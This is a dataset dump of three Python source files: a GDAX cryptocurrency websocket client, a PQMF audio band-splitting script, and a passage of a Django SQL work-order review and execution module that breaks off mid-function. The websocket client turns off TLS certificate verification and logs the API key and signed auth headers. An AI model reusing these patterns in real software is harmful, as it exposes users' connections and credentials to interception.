source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
websocket.py | from __future__ import (absolute_import, division,
print_function, unicode_literals)
from gdax_websocket import constants
from gdax_websocket.auth.APIKeyAuth import generate_nonce, generate_signature
from gdax_websocket.settings import settings
from builtins import *
from pyee import EventEmitter
from time import sleep
from urllib.parse import urlparse
import alog
import json
import ssl
import threading
import time
import traceback
from websocket import WebsocketApp
# Prefix Primus (the realtime transport) puts on its ping frames;
# on_message() matches the first 14 characters against this.
PING_MESSAGE_PREFIX = 'primus::ping::'
# Seconds to wait for the websocket to report a live connection.
CONN_TIMEOUT = 15
# Maximum consecutive reconnect attempts before giving up.
MAX_RECONNECT = 2
class GdaxWebsocket(EventEmitter, WebsocketApp):
    """Event-emitting GDAX realtime websocket client.

    Runs websocket-client's app loop on a daemon thread, parses incoming
    frames, and re-emits them as pyee events ('ping', 'subscribe',
    'status', and per-action keys).  On close/error it reconnects and
    re-subscribes to every previously subscribed channel.

    NOTE(review): several names used below (``self.ws``,
    ``websocket_run_forever``, ``self.data``) are not defined anywhere in
    this file's visible code — presumably provided elsewhere; confirm.
    NOTE(review): websocket-client exports ``WebSocketApp`` (capital S);
    the ``WebsocketApp`` import at the top of the file looks misspelled —
    confirm against the installed package.
    """

    def __init__(self,
                 shouldAuth=False,
                 heartbeatEnabled=True):
        EventEmitter.__init__(self)
        # Bug fix: the constructor arguments were never stored on self,
        # yet build_websocket_url() reads self.heartbeatEnabled and
        # get_auth() reads self.shouldAuth.
        self.shouldAuth = shouldAuth
        self.heartbeatEnabled = heartbeatEnabled
        self.url = self.build_websocket_url()
        self.header = self.get_auth()
        self.sock = None
        self.last_ping_tm = 0
        self.last_pong_tm = 0
        self.channels = []
        self.reconnect_count = 0
        # Bug fix: ``self.__reset()`` name-mangles to
        # ``_GdaxWebsocket__reset``, which does not exist; the method is
        # defined below as ``reset``.
        self.reset()
        self.connect_websocket()

    def re_connect(self):
        """Reconnect and re-subscribe to every previously known channel.

        Raises Exception once MAX_RECONNECT consecutive attempts failed.
        """
        alog.debug('## attempt reconnect: %s' % self.reconnect_count)
        # Bug fix: use >= so the limit still holds if the counter ever
        # skips past the exact value.
        if self.reconnect_count >= MAX_RECONNECT:
            raise Exception("Exceeded reconnection attempts.")
        sleep(1)
        self.reconnect_count += 1
        self.connect_websocket()
        for channel in self.channels:
            self._subscribe_to_channel(channel)

    def build_websocket_url(self, base_url=settings.BASE_URL):
        """Build the wss:// realtime URL, enabling heartbeat if configured."""
        alog.debug('Build websocket url from: %s' % (base_url))
        urlParts = list(urlparse(base_url))
        queryString = ''
        if self.heartbeatEnabled:
            queryString = '?heartbeat=true'
        url = "wss://{}/realtime{}".format(urlParts[1], queryString)
        alog.debug(url)
        return url

    def connect_websocket(self):
        """Connect to the websocket in a thread."""
        alog.debug("### Connecting Websocket ###")
        # setup websocket.run_forever arguments
        wsRunArgs = {
            'sslopt': {"cert_reqs": ssl.CERT_NONE}
        }
        if self.heartbeatEnabled:
            wsRunArgs['ping_timeout'] = 20
            wsRunArgs['ping_interval'] = 60
        alog.debug("websocket.run_forever: %s" % (wsRunArgs))
        # Run the websocket on another thread and enable heartbeat
        self.wst = threading.Thread(
            target=lambda: self.websocket_run_forever(wsRunArgs)
        )
        self.wst.daemon = True
        self.wst.start()
        alog.info("### Started thread")
        self.wait_for_connection()

    def wait_for_connection(self):
        """Block until connected; raise after CONN_TIMEOUT seconds or on error."""
        conn_timeout = CONN_TIMEOUT
        # Wait for connect before continuing
        while (not self.ws.sock or not self.ws.sock.connected) \
                and conn_timeout and not self._error:
            sleep(1)
            conn_timeout -= 1
        if not conn_timeout or self._error:
            raise Exception("Couldn't connect to WS! Exiting.")
        # a successful connect restores the full reconnect budget
        self.reconnect_count = 0

    def on_pong(self, frame, data):
        """websocket-client pong callback (logging only)."""
        alog.debug('## pong')
        alog.debug(data)

    def subscribe_action(self, action, channel, instrument, action_handler):
        """Subscribe to "<channel>:<instrument>" and route the matching
        "<action>:<instrument>:<channel>" events to action_handler."""
        channelKey = "{}:{}".format(channel, instrument)
        alog.debug("Subscribe to action: %s" % (channelKey))
        subscriptionMsg = {"op": "subscribe", "args": [channelKey]}
        action_event_key = self.gen_action_event_key(action,
                                                     instrument,
                                                     channel)
        alog.debug("Subscribe to %s" % (action_event_key))
        self.on(action_event_key, action_handler)
        if channelKey not in self.channels:
            self.channels.append(channelKey)
        alog.debug(subscriptionMsg)
        self.send_message(subscriptionMsg)

    def subscribe(self, channel, handler):
        """Subscribe to a plain channel and attach a local event handler."""
        self._subscribe_to_channel(channel)
        self.on(channel, handler)
        if channel not in self.channels:
            self.channels.append(channel)

    def _subscribe_to_channel(self, channel):
        # Send the subscribe op without touching local handler state
        # (used for both first subscriptions and re-subscribes).
        subscriptionMsg = {"op": "subscribe", "args": [channel]}
        self.send_message(subscriptionMsg)

    def send_message(self, message):
        """JSON-encode and send a message over the socket."""
        self.ws.send(json.dumps(message))

    def error(self, err):
        """Record the error, log it, and shut the socket down."""
        alog.debug('this error...')
        self._error = err
        alog.error(err)
        self.exit()

    def exit(self):
        """Mark the client as exited and close the websocket."""
        self.exited = True
        self.ws.close()

    def is_connected(self):
        """Whether the underlying socket currently reports connected."""
        # Bug fix: the original evaluated this expression but never
        # returned it, so the method always returned None (falsy).
        return self.ws.sock.connected

    def on_subscribe(self, message):
        """Handler for the server's subscribe acknowledgement."""
        if message['success']:
            alog.debug("Subscribed to %s." % message['subscribe'])
        else:
            self.error("Unable to subscribe to %s. Error: \"%s\" Please\
check and restart." % (
                message['request']['args'][0], message['error']))

    # NOTE: a second, dead on_ping(self, frame, data) definition that this
    # one shadowed at runtime has been removed.
    def on_ping(self, message):
        """Handle a primus ping frame: compute latency, emit it, reply pong."""
        timestamp = float(time.time() * 1000)
        # everything after the 14-char 'primus::ping::' prefix is the
        # server's send time in milliseconds
        ping_timestamp = float(message[14:])
        latency = timestamp - ping_timestamp
        alog.debug("ping: %s" % (message))
        alog.debug("ping timestamp: %s" % (timestamp))
        alog.debug("message latency: %s" % (latency))
        self.emit('latency', latency)
        alog.debug(int(timestamp))
        self.send_message("primus::pong::%s" % (timestamp))

    def __on_message(self, ws, message):
        # Private adapter matching websocket-client's (ws, message) signature.
        self.on_message(message)

    def on_message(self, message):
        '''Handler for parsing WS messages.'''
        # Check if ping message
        ping_message = message[:14]
        alog.debug(ping_message)
        if ping_message == PING_MESSAGE_PREFIX:
            alog.debug(message)
            return self.emit('ping', message)
        message = json.loads(message)
        alog.debug(json.dumps(message, indent=4, sort_keys=True))
        action = message['action'] if 'action' in message else None
        try:
            if action:
                table = message['table']
                event_name = ''
                if table in constants.CHANNELS:
                    event_name = "%s:%s" % (action, table)
                else:
                    if len(message['data']) > 0:
                        instrument = message['data'][0]['symbol']
                        event_name = self.gen_action_event_key(action,
                                                               instrument,
                                                               table)
                alog.debug(event_name)
                self.emit(event_name, message)
            elif 'subscribe' in message:
                self.emit('subscribe', message)
            elif 'error' in message:
                self.error(message['error'])
            elif 'status' in message:
                self.emit('status', message)
        except Exception:
            # Bug fix: bare ``except:`` also swallowed SystemExit and
            # KeyboardInterrupt; narrowed to Exception, same logging.
            alog.error(traceback.format_exc())

    def on_status(self, message):
        """Map status payloads to errors (400 generic, 401 bad API key)."""
        if message['status'] == 400:
            self.error(message['error'])
        if message['status'] == 401:
            self.error("API Key incorrect, please check and restart.")

    def gen_action_event_key(self, event, instrument, table):
        """Build the "<action>:<instrument>:<table>" event key."""
        return "%s:%s:%s" % (event, instrument, table)

    #
    # Private methods
    #

    def get_auth(self):
        '''Return auth headers. Will use API Keys if present in settings.'''
        alog.debug('shouldAuth: %s' % self.shouldAuth)
        if self.shouldAuth:
            alog.info("Authenticating with API Key.")
            # To auth to the WS using an API key, we generate a signature
            # of a nonce and the WS API endpoint.
            alog.debug(settings.GDAX_API_KEY)
            nonce = generate_nonce()
            api_signature = generate_signature(
                settings.GDAX_API_SECRET, 'GET', '/realtime', nonce, '')
            auth = [
                "api-nonce: " + str(nonce),
                "api-signature: " + api_signature,
                "api-key:" + settings.GDAX_API_KEY
            ]
            alog.debug(auth)
            return auth
        else:
            return []

    def wait_for_account(self):
        '''On subscribe, this data will come down. Wait for it.'''
        # Wait for the keys to show up from the ws.
        # NOTE(review): ``self.data`` is never assigned in this file —
        # confirm where it is populated.
        while not {'margin', 'position', 'order'} <= set(self.data):
            sleep(0.1)

    def wait_for_symbol(self, symbol):
        '''On subscribe, this data will come down. Wait for it.'''
        while not {'instrument', 'trade', 'quote'} <= set(self.data):
            sleep(0.1)

    def send_command(self, command, args=None):
        '''Send a raw command.'''
        # Bug fix: mutable default argument ([]) replaced with the
        # None-sentinel idiom; default behavior is unchanged.
        if args is None:
            args = []
        self.ws.send(json.dumps({"op": command, "args": args}))

    def on_open(self, ws):
        alog.debug("Websocket Opened.")

    def on_close(self, ws):
        """Emit 'close', shut down, then attempt to reconnect."""
        alog.info('Websocket Closed')
        self.emit('close')
        self.exit()
        self.re_connect()

    def on_error(self, ws, error):
        """Propagate the error and attempt to reconnect unless already exited."""
        if not self.exited:
            self.emit('error', error)
            self.error(error)
            self.exit()
            self.re_connect()

    def reset(self):
        """Drop all listeners, re-register built-in handlers, clear state."""
        self.remove_all_listeners()
        self.on('subscribe', self.on_subscribe)
        self.on('ping', self.on_ping)
        self.exited = False
        self._error = None
|
proc_wav_pqmf.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2021 Patrick Lumban Tobing (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
from __future__ import division
from __future__ import print_function
import argparse
from distutils.util import strtobool
import multiprocessing as mp
import os
import sys
import numpy as np
import soundfile as sf
from scipy.signal import lfilter
import torch
from pqmf import PQMF
from utils import find_files
from utils import read_txt
# Target sampling rate in Hz (alternatives kept for reference).
##FS = 16000
#FS = 22050
FS = 24000
##FS = 44100
##FS = 48000
# Pre-emphasis coefficient; deemphasis() applies the inverse filter.
ALPHA = 0.85
# Default number of PQMF sub-bands.
N_BANDS = 5
def deemphasis(x, alpha=ALPHA):
    """Undo pre-emphasis on *x* with the IIR filter 1 / (1 - alpha * z^-1)."""
    numerator = np.array([1.], x.dtype)
    denominator = np.array([1., -alpha], x.dtype)
    return lfilter(numerator, denominator, x)
def main():
    """Split input wavs into PQMF sub-bands and write per-band files plus a
    de-emphasized resynthesized wav, fanned out over n_jobs processes."""
    parser = argparse.ArgumentParser(
        description="making feature file argsurations.")
    parser.add_argument(
        "--waveforms", default=None,
        help="directory or list of filename of input wavfile")
    parser.add_argument(
        "--writedir", default=None,
        help="directory to save preprocessed wav file")
    parser.add_argument(
        "--writesyndir", default=None,
        help="directory to save preprocessed wav file")
    parser.add_argument(
        "--fs", default=FS,
        type=int, help="Sampling frequency")
    parser.add_argument(
        "--n_bands", default=N_BANDS,
        type=int, help="number of bands for multiband analysis")
    parser.add_argument(
        "--alpha", default=ALPHA,
        type=float, help="coefficient of pre-emphasis")
    parser.add_argument(
        "--verbose", default=1,
        type=int, help="log message level")
    parser.add_argument(
        '--n_jobs', default=1,
        type=int, help="number of parallel jobs")
    args = parser.parse_args()

    # read list: a directory of wavs, or a text file listing wav paths
    if os.path.isdir(args.waveforms):
        file_list = sorted(find_files(args.waveforms, "*.wav"))
    else:
        file_list = read_txt(args.waveforms)

    # check directory existence
    if not os.path.exists(args.writedir):
        os.makedirs(args.writedir)
    if not os.path.exists(args.writesyndir):
        os.makedirs(args.writesyndir)

    def noise_shaping(wav_list):
        # Worker run in a child process: analyze each wav into PQMF bands,
        # write each band, then resynthesize, de-emphasize and write it.
        pqmf = PQMF(args.n_bands)
        print(f'{pqmf.subbands} {pqmf.A} {pqmf.taps} {pqmf.cutoff_ratio} {pqmf.beta}')
        #fs_band = args.fs // args.n_bands
        #print(f'{pqmf.subbands} {pqmf.A} {pqmf.taps} {pqmf.cutoff_ratio} {pqmf.beta} {fs_band}')
        for wav_name in wav_list:
            x, fs = sf.read(wav_name)
            ## check sampling frequency
            if not fs == args.fs:
                print("ERROR: sampling frequency is not matched.")
                sys.exit(1)
            x_bands_ana = pqmf.analysis(torch.FloatTensor(x).unsqueeze(0).unsqueeze(0))
            print(x_bands_ana.shape)
            x_bands_syn = pqmf.synthesis(x_bands_ana)
            print(x_bands_syn.shape)
            for i in range(args.n_bands):
                # clip to the int16-representable range before PCM_16 write
                wav = np.clip(x_bands_ana[0,i].data.numpy(), -1, 0.999969482421875)
                if args.n_bands < 10:
                    wavpath = os.path.join(args.writedir, os.path.basename(wav_name).split(".")[0]+"_B-"+str(i+1)+".wav")
                else:
                    # with >= 10 bands, zero-pad single-digit band indices
                    # so the filenames sort consistently
                    if i < args.n_bands - 1:
                        wavpath = os.path.join(args.writedir, os.path.basename(wav_name).split(".")[0]+"_B-0"+str(i+1)+".wav")
                    else:
                        wavpath = os.path.join(args.writedir, os.path.basename(wav_name).split(".")[0]+"_B-"+str(i+1)+".wav")
                print(wavpath)
                sf.write(wavpath, wav, fs, 'PCM_16')
                #sf.write(wavpath, wav, fs_band, 'PCM_16')
            wav = np.clip(x_bands_syn[0,0].data.numpy(), -1, 0.999969482421875)
            wav = deemphasis(wav, alpha=args.alpha)
            wavpath = os.path.join(args.writesyndir, os.path.basename(wav_name))
            print(wavpath)
            sf.write(wavpath, wav, fs, 'PCM_16')

    # divide list across workers
    file_lists = np.array_split(file_list, args.n_jobs)
    file_lists = [f_list.tolist() for f_list in file_lists]

    # multi processing
    # NOTE(review): targeting the nested function works only with the
    # 'fork' start method (Unix) — confirm if spawn platforms are needed.
    processes = []
    for f in file_lists:
        p = mp.Process(target=noise_shaping, args=(f,))
        p.start()
        processes.append(p)

    # wait for all process
    for p in processes:
        p.join()


if __name__ == "__main__":
    main()
|
sql_workflow.py | # -*- coding: UTF-8 -*-
import datetime
import logging
import re
import traceback
from threading import Thread
import simplejson as json
from django.contrib.auth.decorators import permission_required
from django.core.exceptions import PermissionDenied
from django.db import transaction, connection
from django.db.models import Q
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
from django.urls import reverse
from django.utils import timezone
from common.config import SysConfig
from common.utils.const import Const, WorkflowDict
from common.utils.extend_json_encoder import ExtendJSONEncoder
from sql.models import SqlGroup, Users
from sql.utils.execute_sql import execute_call_back, execute_skipinc_call_back
from sql.utils.group import user_groups, user_instances
from sql.utils.inception import InceptionDao
from sql.utils.jobs import add_sqlcronjob, del_sqlcronjob
from sql.utils.sql_review import can_timingtask, getDetailUrl, can_cancel, can_execute
from sql.utils.workflow import Workflow
from .models import SqlWorkflow
logger = logging.getLogger('default')
# Maps workflow ID -> {SQL text: sqlSHA1}, caching Inception review results
# to minimise database round trips.
# Format: {workflow_id_1: {sql_1: sha1_1, sql_2: sha1_2}, }
sqlSHA1_cache = {}
workflowOb = Workflow()
# Work-order (review) listing
@permission_required('sql.menu_sqlworkflow', raise_exception=True)
def sqlworkflowlist(request):
    """Paginated JSON listing of SQL work orders.

    Visibility: superusers see everything; users with review/execute
    permission see work orders of their resource groups; everyone else
    sees only work orders they submitted.  navStatus is either 'all'
    (with optional search) or a key of Const.workflowStatus.
    """
    # current user
    user = request.user
    limit = int(request.POST.get('limit'))
    offset = int(request.POST.get('offset'))
    limit = offset + limit  # turn the page size into an absolute slice end
    search = request.POST.get('search', '')
    # status filter
    navStatus = request.POST.get('navStatus')
    # admins see all work orders; others see those they submitted or review
    user = request.user
    # 'all' still honours the search term
    if navStatus == 'all':
        if user.is_superuser == 1:
            workflowlist = SqlWorkflow.objects.filter(
                Q(engineer_display__contains=search) | Q(workflow_name__contains=search)
            ).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer_display", "status",
                                                            "is_backup", "create_time", "instance_name", "db_name",
                                                            "group_name", "sql_syntax")
            count = SqlWorkflow.objects.filter(
                Q(engineer_display__contains=search) | Q(workflow_name__contains=search)).count()
        elif user.has_perm('sql.sql_review') or user.has_perm('sql.sql_execute'):
            # resource groups the user belongs to
            group_list = user_groups(user)
            group_ids = [group.group_id for group in group_list]
            workflowlist = SqlWorkflow.objects.filter(group_id__in=group_ids).filter(
                Q(engineer_display__contains=search) | Q(workflow_name__contains=search)
            ).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer_display", "status",
                                                            "is_backup", "create_time", "instance_name", "db_name",
                                                            "group_name", "sql_syntax")
            count = SqlWorkflow.objects.filter(group_id__in=group_ids).filter(
                Q(engineer_display__contains=search) | Q(workflow_name__contains=search)
            ).count()
        else:
            workflowlist = SqlWorkflow.objects.filter(engineer=user.username).filter(
                workflow_name__contains=search
            ).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer_display", "status",
                                                            "is_backup", "create_time", "instance_name", "db_name",
                                                            "group_name", "sql_syntax")
            count = SqlWorkflow.objects.filter(engineer=user.username).filter(
                workflow_name__contains=search).count()
    elif navStatus in Const.workflowStatus.keys():
        if user.is_superuser == 1:
            workflowlist = SqlWorkflow.objects.filter(
                status=Const.workflowStatus[navStatus]
            ).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer_display", "status",
                                                            "is_backup", "create_time", "instance_name", "db_name",
                                                            "group_name", "sql_syntax")
            count = SqlWorkflow.objects.filter(status=Const.workflowStatus[navStatus]).count()
        elif user.has_perm('sql.sql_review') or user.has_perm('sql.sql_execute'):
            # resource groups the user belongs to
            group_list = user_groups(user)
            group_ids = [group.group_id for group in group_list]
            workflowlist = SqlWorkflow.objects.filter(status=Const.workflowStatus[navStatus], group_id__in=group_ids
                                                      ).order_by('-create_time')[offset:limit].values("id",
                                                                                                      "workflow_name",
                                                                                                      "engineer_display",
                                                                                                      "status",
                                                                                                      "is_backup",
                                                                                                      "create_time",
                                                                                                      "instance_name",
                                                                                                      "db_name",
                                                                                                      "group_name",
                                                                                                      "sql_syntax")
            count = SqlWorkflow.objects.filter(status=Const.workflowStatus[navStatus], group_id__in=group_ids).count()
        else:
            workflowlist = SqlWorkflow.objects.filter(status=Const.workflowStatus[navStatus], engineer=user.username
                                                      ).order_by('-create_time')[offset:limit].values("id",
                                                                                                      "workflow_name",
                                                                                                      "engineer_display",
                                                                                                      "status",
                                                                                                      "is_backup",
                                                                                                      "create_time",
                                                                                                      "instance_name",
                                                                                                      "db_name",
                                                                                                      "group_name",
                                                                                                      "sql_syntax")
            count = SqlWorkflow.objects.filter(status=Const.workflowStatus[navStatus], engineer=user.username).count()
    else:
        context = {'errMsg': '传入的navStatus参数有误!'}
        return render(request, 'error.html', context)
    # serialize the QuerySet
    rows = [row for row in workflowlist]
    result = {"total": count, "rows": rows}
    # return the query result as JSON
    return HttpResponse(json.dumps(result, cls=ExtendJSONEncoder, bigint_as_string=True),
                        content_type='application/json')
# SQL pre-check
@permission_required('sql.sql_submit', raise_exception=True)
def simplecheck(request):
    """Run submitted SQL through Inception auto-review; return the review
    rows plus warning/error counts as JSON."""
    sql_content = request.POST.get('sql_content')
    instance_name = request.POST.get('instance_name')
    db_name = request.POST.get('db_name')
    result = {'status': 0, 'msg': 'ok', 'data': {}}
    # server-side parameter validation
    if sql_content is None or instance_name is None or db_name is None:
        result['status'] = 1
        result['msg'] = '页面提交参数可能为空'
        return HttpResponse(json.dumps(result), content_type='application/json')
    # # strip comment-only statements
    # sql_content = ''.join(
    #     map(lambda x: re.compile(r'(^--.*|^/\*.*\*/;\s*$)').sub('', x, count=1),
    #         sql_content.splitlines(1))).strip()
    # # drop consecutive blank lines
    # sql_content = re.sub('[\r\n\f]{2,}', '\n', sql_content)
    sql_content = sql_content.strip()
    # hand over to Inception for automatic review
    try:
        inception_result = InceptionDao(instance_name=instance_name).sqlautoReview(sql_content, db_name)
    except Exception as e:
        logger.error(traceback.format_exc())
        result['status'] = 1
        result['msg'] = str(e)
        return HttpResponse(json.dumps(result), content_type='application/json')
    if inception_result is None or len(inception_result) == 0:
        result['status'] = 1
        result['msg'] = 'inception返回的结果集为空!可能是SQL语句有语法错误'
        return HttpResponse(json.dumps(result), content_type='application/json')
    # convert the result rows into JSON-friendly dicts for the detail page
    column_list = ['ID', 'stage', 'errlevel', 'stagestatus', 'errormessage', 'SQL', 'Affected_rows', 'sequence',
                   'backup_dbname', 'execute_time', 'sqlsha1']
    rows = []
    CheckWarningCount = 0
    CheckErrorCount = 0
    for row_index, row_item in enumerate(inception_result):
        row = {}
        row['ID'] = row_item[0]
        row['stage'] = row_item[1]
        row['errlevel'] = row_item[2]
        # errlevel: 1 = warning, 2 = error
        if row['errlevel'] == 1:
            CheckWarningCount = CheckWarningCount + 1
        elif row['errlevel'] == 2:
            CheckErrorCount = CheckErrorCount + 1
        row['stagestatus'] = row_item[3]
        row['errormessage'] = row_item[4]
        row['SQL'] = row_item[5]
        row['Affected_rows'] = row_item[6]
        row['sequence'] = row_item[7]
        row['backup_dbname'] = row_item[8]
        row['execute_time'] = row_item[9]
        # row['sqlsha1'] = row_item[10]
        rows.append(row)
    result['data']['rows'] = rows
    result['data']['column_list'] = column_list
    result['data']['CheckWarningCount'] = CheckWarningCount
    result['data']['CheckErrorCount'] = CheckErrorCount
    return HttpResponse(json.dumps(result), content_type='application/json')
# SQL submission
@permission_required('sql.sql_submit', raise_exception=True)
def autoreview(request):
    """Create (or update) a SQL work order after Inception auto-review,
    then kick off the manual-review workflow and redirect to the detail page."""
    workflowid = request.POST.get('workflowid')
    sql_content = request.POST['sql_content']
    workflowName = request.POST['workflow_name']
    group_name = request.POST['group_name']
    group_id = SqlGroup.objects.get(group_name=group_name).group_id
    instance_name = request.POST['instance_name']
    db_name = request.POST.get('db_name')
    isBackup = request.POST['is_backup']
    notify_users = request.POST.getlist('notify_users')
    # server-side parameter validation
    if sql_content is None or workflowName is None or instance_name is None or db_name is None or isBackup is None:
        context = {'errMsg': '页面提交参数可能为空'}
        return render(request, 'error.html', context)
    # group permission check (user in the group; group linked to the instance)
    try:
        user_instances(request.user, 'master').get(instance_name=instance_name)
    except Exception:
        context = {'errMsg': '你所在组未关联该主库!'}
        return render(request, 'error.html', context)
    # # strip comment-only statements
    # sql_content = ''.join(
    #     map(lambda x: re.compile(r'(^--.*|^/\*.*\*/;\s*$)').sub('', x, count=1),
    #         sql_content.splitlines(1))).strip()
    # # drop consecutive blank lines
    # sql_content = re.sub('[\r\n\f]{2,}', '\n', sql_content)
    sql_content = sql_content.strip()
    if sql_content[-1] != ";":
        context = {'errMsg': "SQL语句结尾没有以;结尾,请后退重新修改并提交!"}
        return render(request, 'error.html', context)
    # hand over to Inception for automatic review
    try:
        inception_result = InceptionDao(instance_name=instance_name).sqlautoReview(sql_content, db_name)
    except Exception as msg:
        context = {'errMsg': msg}
        return render(request, 'error.html', context)
    if inception_result is None or len(inception_result) == 0:
        context = {'errMsg': 'inception返回的结果集为空!可能是SQL语句有语法错误'}
        return render(request, 'error.html', context)
    # store the review result as JSON for the detail page
    jsonResult = json.dumps(inception_result)
    workflowStatus = Const.workflowStatus['manreviewing']
    # flag work orders Inception cannot handle for manual (direct) execution:
    # any errlevel-2 row, or an error message matching *comments*
    is_manual = 0
    for row in inception_result:
        if row[2] == 2:
            is_manual = 1
            break
        elif re.match(r"\w*comments\w*", row[4]):
            is_manual = 1
            break
    # classify the SQL: 1 = DDL, 2 = DML
    sql_syntax = 2
    for row in sql_content.strip(';').split(';'):
        if re.match(r"^alter|^create|^drop|^truncate|^rename", row.strip().lower()):
            sql_syntax = 1
            break
    # create the work order; transaction keeps order + audit consistent
    try:
        with transaction.atomic():
            # persist the work order
            engineer = request.user.username
            if not workflowid:
                sql_workflow = SqlWorkflow()
                sql_workflow.create_time = timezone.now()
            else:
                sql_workflow = SqlWorkflow.objects.get(id=int(workflowid))
            sql_workflow.workflow_name = workflowName
            sql_workflow.group_id = group_id
            sql_workflow.group_name = group_name
            sql_workflow.engineer = engineer
            sql_workflow.engineer_display = request.user.display
            sql_workflow.audit_auth_groups = Workflow.auditsettings(group_id, WorkflowDict.workflow_type['sqlreview'])
            sql_workflow.status = workflowStatus
            sql_workflow.is_backup = isBackup
            sql_workflow.review_content = jsonResult
            sql_workflow.instance_name = instance_name
            sql_workflow.db_name = db_name
            sql_workflow.sql_content = sql_content
            sql_workflow.execute_result = ''
            sql_workflow.is_manual = is_manual
            sql_workflow.audit_remark = ''
            sql_workflow.sql_syntax = sql_syntax
            sql_workflow.save()
            workflowId = sql_workflow.id
            # only auto-review-passed orders enter the audit workflow
            if workflowStatus == Const.workflowStatus['manreviewing']:
                # register the audit record (workflow_type=2 is the review
                # request) and CC the notify users
                listCcAddr = [email['email'] for email in
                              Users.objects.filter(username__in=notify_users).values('email')]
                workflowOb.addworkflowaudit(request, WorkflowDict.workflow_type['sqlreview'], workflowId,
                                            listCcAddr=listCcAddr)
    except Exception as msg:
        logger.error(traceback.format_exc())
        context = {'errMsg': msg}
        return render(request, 'error.html', context)
    return HttpResponseRedirect(reverse('sql:detail', args=(workflowId,)))
# Approve (review pass) without executing
@permission_required('sql.sql_review', raise_exception=True)
def passed(request):
    """Mark a work order as review-approved through the audit workflow."""
    workflowId = request.POST['workflowid']
    if workflowId == '' or workflowId is None:
        context = {'errMsg': 'workflowId参数为空.'}
        return render(request, 'error.html', context)
    workflowId = int(workflowId)
    workflowDetail = SqlWorkflow.objects.get(id=workflowId)
    audit_remark = request.POST.get('audit_remark', '')
    user = request.user
    if Workflow.can_review(request.user, workflowId, 2) is False:
        context = {'errMsg': '你无权操作当前工单!'}
        return render(request, 'error.html', context)
    # transaction keeps the audit record and the order status consistent
    try:
        with transaction.atomic():
            # fetch the audit record, then approve through the workflow engine
            audit_id = Workflow.auditinfobyworkflow_id(workflow_id=workflowId,
                                                       workflow_type=WorkflowDict.workflow_type['sqlreview']).audit_id
            auditresult = workflowOb.auditworkflow(request, audit_id, WorkflowDict.workflow_status['audit_success'],
                                                   user.username, audit_remark)
            # sync the business table with the audit outcome
            if auditresult['data']['workflow_status'] == WorkflowDict.workflow_status['audit_success']:
                # set status to 'pass' and stamp reviewok_time
                workflowDetail.status = Const.workflowStatus['pass']
                workflowDetail.reviewok_time = timezone.now()
                workflowDetail.audit_remark = audit_remark
                workflowDetail.save()
    except Exception as msg:
        logger.error(traceback.format_exc())
        context = {'errMsg': msg}
        return render(request, 'error.html', context)
    return HttpResponseRedirect(reverse('sql:detail', args=(workflowId,)))
# Execute the SQL only
@permission_required('sql.sql_execute', raise_exception=True)
def execute(request):
    """Execute an approved work order.

    Dispatches execution to a background thread — through Inception when
    is_manual == 0, directly otherwise — removes any scheduled cron job,
    logs the action, and redirects to the detail page.
    """
    workflowId = request.POST['workflowid']
    if workflowId == '' or workflowId is None:
        context = {'errMsg': 'workflowId参数为空.'}
        return render(request, 'error.html', context)
    workflowId = int(workflowId)
    workflowDetail = SqlWorkflow.objects.get(id=workflowId)
    instance_name = workflowDetail.instance_name
    db_name = workflowDetail.db_name
    url = getDetailUrl(request, workflowId)
    if can_execute(request.user, workflowId) is False:
        context = {'errMsg': '你无权操作当前工单!'}
        return render(request, 'error.html', context)
    # block critical/high-risk DDL if the regex is configured
    if SysConfig().sys_config.get('critical_ddl_regex', '') != '':
        if InceptionDao().criticalDDL(workflowDetail.sql_content):
            context = {'errMsg': '高危语句,禁止执行!'}
            return render(request, 'error.html', context)
    # Bug fix: remember the status *before* overwriting it — the original
    # compared workflowDetail.status (already set to 'executing') against
    # 'timingtask' below, so the scheduled cron job was never deleted.
    status_before_execute = workflowDetail.status
    # switch to 'executing' and stamp reviewok_time
    workflowDetail.status = Const.workflowStatus['executing']
    workflowDetail.reviewok_time = timezone.now()
    workflowDetail.save()
    # is_manual == 0: run through Inception; == 1: Inception rejected the
    # review, execute directly
    if workflowDetail.is_manual == 0:
        # Re-split and re-check before executing to refresh the SHA1 cache;
        # doing this concurrently from another process can crash Inception.
        try:
            splitReviewResult = InceptionDao(instance_name=instance_name).sqlautoReview(workflowDetail.sql_content,
                                                                                        db_name,
                                                                                        isSplit='yes')
        except Exception as msg:
            logger.error(traceback.format_exc())
            context = {'errMsg': msg}
            return render(request, 'error.html', context)
        workflowDetail.review_content = json.dumps(splitReviewResult)
        try:
            workflowDetail.save()
        except Exception:
            # reopen the connection in case it timed out
            connection.close()
            workflowDetail.save()
        # execute asynchronously so the request doesn't hang in 'executing'
        t = Thread(target=execute_call_back, args=(workflowId, instance_name, url))
        t.start()
    else:
        # execute asynchronously so the request doesn't hang in 'executing'
        t = Thread(target=execute_skipinc_call_back,
                   args=(workflowId, instance_name, db_name, workflowDetail.sql_content, url))
        t.start()
    # drop the scheduled cron job if this order was a timed task
    if status_before_execute == Const.workflowStatus['timingtask']:
        job_id = Const.workflowJobprefix['sqlreview'] + '-' + str(workflowId)
        del_sqlcronjob(job_id)
    # add a work-order log entry
    audit_id = Workflow.auditinfobyworkflow_id(workflow_id=workflowId,
                                               workflow_type=WorkflowDict.workflow_type['sqlreview']).audit_id
    workflowOb.add_workflow_log(audit_id=audit_id,
                                operation_type=5,
                                operation_type_desc='执行工单',
                                operation_info="人工操作执行",
                                operator=request.user.username,
                                operator_display=request.user.display
                                )
    return HttpResponseRedirect(reverse('sql:detail', args=(workflowId,)))
# Schedule SQL execution for a later time
@permission_required('sql.sql_execute', raise_exception=True)
def timingtask(request):
    """Register a cron job that executes the work order at run_date."""
    workflowId = request.POST.get('workflowid')
    run_date = request.POST.get('run_date')
    if run_date is None or workflowId is None:
        context = {'errMsg': '时间不能为空'}
        return render(request, 'error.html', context)
    # NOTE(review): lexicographic string comparison — valid only because
    # both sides use the zero-padded '%Y-%m-%d %H:%M:%S' format.
    elif run_date < datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'):
        context = {'errMsg': '时间不能小于当前时间'}
